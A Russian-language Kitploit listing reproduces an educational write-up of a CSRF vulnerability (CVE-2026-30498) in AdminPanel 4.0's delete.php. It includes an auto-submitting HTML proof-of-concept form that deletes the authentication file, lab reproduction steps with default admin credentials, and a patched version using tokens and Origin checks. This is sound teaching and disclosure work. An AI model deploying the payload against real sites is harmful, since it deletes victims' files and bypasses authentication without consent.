Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-30498 — Образовательная демонстрация уязвимости CSRF в контролируемой лабораторной среде, включающая proof-of-concept эксплойт и исправленную версию с надлежащими механизмами защиты от CSRF. | Kitploit
Инструменты/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

Образовательная демонстрация уязвимости CSRF в контролируемой лабораторной среде, включающая proof-of-concept эксплойт и исправленную версию с надлежащими механизмами защиты от CSRF.

Репозиторий
15 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-30498 – Уязвимость CSRF (AdminPanel 4.0)


Обзор

ID CVE: CVE-2026-30498 (Зарезервирован MITRE)
Автор обнаружения: Мехди Бен Хаму

Уязвимость Межсайтовой подделки запроса (CSRF) существует в конечной точке delete.php в AdminPanel 4.0.

Эта уязвимость позволяет злоумышленнику инициировать конфиденциальные действия (удаление файлов) от имени аутентифицированного пользователя без его согласия.


Технические детали

Уязвимость вызвана отсутствием механизмов защиты CSRF:

  • Отсутствует проверка CSRF-токена
  • Отсутствует проверка Origin / Referer
  • Конфиденциальное действие доступно через GET-запрос
  • Отсутствует проверка намерений пользователя

Уязвимая конечная точка обрабатывает запросы напрямую на основе пользовательской сессии без проверки источника запроса.


Воздействие

Успешная эксплуатация приводит к:

  • Удалению verifyPanel.php
  • Обходу аутентификации
  • Переходу приложения в режим установки
  • Возможной полной реинициализации системы

  • Затронутая версия

    • AdminPanel 4.0 и более ранние версии (архивный проект)

    Сценарий атаки

    Злоумышленник размещает вредоносную веб-страницу, которая отправляет поддельный запрос:

    root@kitploit:~
    http://localhost:8080/delete.php?file=verifyPanel.php
    

    Когда жертва (аутентифицированный пользователь) посещает эту страницу, браузер автоматически включает сессионные cookie, и запрос выполняется.


    Доказательство концепции (PoC)

    Вредоносная страница (злоумышленник)

    root@kitploit:~
    <form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
      <input type="hidden" name="file" value="verifyPanel.php">
    </form>
    <script>
      document.getElementById("csrfForm").submit();
    </script>
    

    Этот запрос автоматически отправляется с сессионным cookie жертвы.


    Шаги воспроизведения

    1. Запустите сервер жертвы:
    root@kitploit:~
    php -S localhost:8080
    
    1. Откройте страницу входа:
    root@kitploit:~
    http://localhost:8080
    
    1. Войдите, используя:
    root@kitploit:~
    admin / admin123
    
    1. Откройте страницу злоумышленника:
    root@kitploit:~
    http://localhost:8081/evil.html
    
    1. Запустите CSRF-атаку
    2. Вернитесь на панель управления:
    root@kitploit:~
    /panel/dashboard.php
    

    Что происходит внутри

    1. Жертва входит в систему → создаётся сессионный cookie
    2. Страница злоумышленника отправляет поддельный запрос
    3. Браузер автоматически прикрепляет cookie
    4. Сервер выполняет удаление без проверки
    5. Система обнаруживает отсутствие файла аутентификации
    6. Приложение переходит в режим установки

    Лабораторная среда (педагогическая симуляция)

    Этот репозиторий включает контролируемую лабораторную среду для безопасного воспроизведения уязвимости.

    Важно: Эта лаборатория является симуляцией и не представляет собой точную оригинальную кодовую базу AdminPanel.

    Сброс лаборатории

    Для сброса среды:

    root@kitploit:~
    /reset.php
    

    Исправленная версия (смягчение)

    Безопасная версия реализована в:

    root@kitploit:~
    delete_fixed.php
    

    Добавленные меры защиты:

    • ✅ Проверка CSRF-токена
    • ✅ Только метод POST
    • ✅ Проверка Origin / Referer
    • ✅ Проверка сессии

    Почему исправление работает

    • Злоумышленник не может получить доступ к CSRF-токену (политика Same-Origin)
    • Поддельные запросы не содержат действительного токена → отклоняются
    • Межсайтовые запросы блокируются через проверку Origin

    Структура проекта

    root@kitploit:~
    victim/
    ├── index.php
    ├── delete.php
    ├── delete_fixed.php
    ├── reset.php
    └── panel/
        └── dashboard.php
    
    attacker/
    └── evil.html
    

    Отказ от ответственности

    Этот проект предназначен только для образовательных и исследовательских целей.
    Не используйте эту уязвимость на системах без соответствующего разрешения.

    Скачать инструмент